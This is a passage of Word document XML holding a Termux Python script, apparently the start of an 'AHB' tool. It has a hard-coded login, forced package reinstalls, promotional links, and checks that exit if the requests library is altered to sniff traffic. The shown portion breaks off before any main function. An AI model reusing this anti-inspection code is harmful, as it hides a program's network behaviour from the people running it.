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B730B" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5FA93FA4" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎import re</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFB5DD3" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184B7365" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2196BA64" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hashlib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2E7959DB" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎import random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00790400" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎import string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9B1485" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016F05B8" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3B02CB" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="41E6D9E6" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>urllib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="50421BB7" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎from bs4 import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeautifulSoup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="132E24D5" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎from random import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>randint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6C47C1B0" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>concurrent.futures</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ThreadPoolExecutor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tred</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="17DE73A0" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> import system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C06902D" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎from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32D5DA07" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511A038D" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎# Ensure required modules are installed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E071D39" w14:textId="01B741E1" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎modules = [‘requests’, ‘urllib3’, ‘mechanize’, ‘rich’]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F90E38" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎for module in modules:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA32D38" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110AA400" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        __import__(module)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604241A1" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    except </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ImportError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DCAF14" w14:textId="0417AEF3" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os.system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f’pip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> install {module}’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75357A30" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9D812B" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎# Suppress </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>InsecureRequestWarning</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="78712084" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>requests.exceptions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ConnectionError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="26F95640" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎from requests import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, models, sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466E971D" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎requests.urllib3.disable_warnings()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA8006A" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎# login system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1724A3EC" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getpass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="73B15E29" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76764B65" w14:textId="22BBE248" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎username = “SHAHZADA”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33374F50" w14:textId="61745EEC" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎password = “BRAND”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEA8002" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3DC5AA" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎# username input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D4C4AD" w14:textId="6BA026C5" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎user = input(“Enter username: “)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778A0A58" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎# password input (hidden)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BBC896" w14:textId="2F1AFB16" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎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getpass.getpass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(“Enter password: “)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100AC44A" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0818FB4A" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎if user == username and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> == password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416D0665" w14:textId="1A6CE0DA" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    print(“✅ Login successful!”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9B3998" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    # </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yahan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>apna</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> main tool </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chalega</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="73FD3B15" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D07DAD" w14:textId="1D21D1D4" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    print(“❌ Wrong username or password!”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D724903" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    exit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0467D8E7" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF8BD1C" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎# Initial setup and promotion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477B8E93" w14:textId="7BABA7F6" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os.system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(‘clear’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A19681B" w14:textId="4B267F2A" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎print(‘ \x1b[38;5;46mAHB SERVER LOADING….’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBBB151" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8E64A4" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B7B6ED" w14:textId="3E84CBAA" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os.system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(‘pip uninstall requests </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chardet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> urllib3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>idna</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>certifi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>y;pip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chardet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> urllib3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>idna</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>certifi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> requests’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F189A7" w14:textId="2DDD17B0" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os.system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(‘pip install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>httpx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pip install beautifulsoup4’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623A8031" w14:textId="2D003606" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎print(‘loading Modules …\n’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7954BE4D" w14:textId="14E6C885" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os.system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(‘clear’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43157C65" w14:textId="612AA5B5" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os.system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xdg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-open </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="009D452A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.youtube.com/@AliRafique2962-B</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A52023D" w14:textId="6F7011C0" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os.system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xdg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-open </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="009D452A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.facebook.com/BaLoch0654</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272CA5F1" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E6E8D6" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137F553A" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎# --- Anti-tampering and Security Checks ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F552BC" w14:textId="189CE754" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎# The script checks if the source code of the ‘requests’ library has been modified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C73C6C5" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎# or if packet sniffing tools are being used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609D508D" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E281B06" w14:textId="2D5B4594" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api_body</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = open(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.__file__, ‘r’).read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A17AF0" w14:textId="31BC48DC" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>models_body</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = open(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>models.__file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>__, ‘r’).read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F62726" w14:textId="02604CA7" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>session_body</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = open(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sessions.__file</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>__, ‘r’).read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0248AE1B" w14:textId="438028A9" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>word_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = [‘print’, ‘lambda’, ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zlib.decompress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>’]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394BF85B" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    for word in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>word_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32839DE4" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎        if word in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api_body</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> or word in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>models_body</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> or word in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>session_body</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4D14B5" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            exit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E205EA2" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎except:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADB68DB" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E528B12" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAE38EF" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CB0B5C" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎class sec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7F766E" w14:textId="06D3B5D6" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    “””</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEF21AB" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    A security class to detect debugging and packet sniffing tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EB7072" w14:textId="1EFBF2B5" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    “””</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7845784A" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎   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C249589" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>self.__module</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>__ = __name__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42897CC4" w14:textId="4209CDD8" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        self.__</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>qualname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>__ = ‘sec’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F84366F" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        # Paths to check for modifications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2901E2" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        paths = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063A38D6" w14:textId="3223903F" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            ‘/data/data/com.termux/files/usr/lib/python3.12/site-packages/requests/sessions.py’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A31548" w14:textId="62A10AB5" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            ‘/data/data/com.termux/files/usr/lib/python3.12/site-packages/requests/api.py’,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45740CB9" w14:textId="7F0EED45" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            ‘/data/data/com.termux/files/usr/lib/python3.12/site-packages/requests/models.py’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1018FD70" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BF6F35" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        for path in paths:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3019FC9A" w14:textId="551925BC" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            if ‘print’ in open(path, ‘r’).read():</w:t>
      </w:r>
    </w:p>
